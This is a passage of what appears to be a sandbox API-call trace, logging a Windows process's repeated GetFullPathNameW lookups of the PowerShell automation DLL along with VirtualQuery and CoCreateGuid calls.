[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.846] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.846] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.846] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.846] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.847] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] VirtualQuery (in: lpAddress=0x10b420, lpBuffer=0x10c2e0, dwLength=0x30 | out: lpBuffer=0x10c2e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.848] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xcad224ee, Data2=0xd10e, Data3=0x47a4, Data4=([0]=0xbe, [1]=0xed, [2]=0x6d, [3]=0xc1, [4]=0x5, [5]=0x72, [6]=0xc2, [7]=0x3f))) returned 0x0
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xba8f7075, Data2=0xcc87, Data3=0x4dc6, Data4=([0]=0xb1, [1]=0xb7, [2]=0x7c, [3]=0x16, [4]=0x81, [5]=0xeb, [6]=0xa, [7]=0x1))) returned 0x0
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.850] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.851] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.851] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
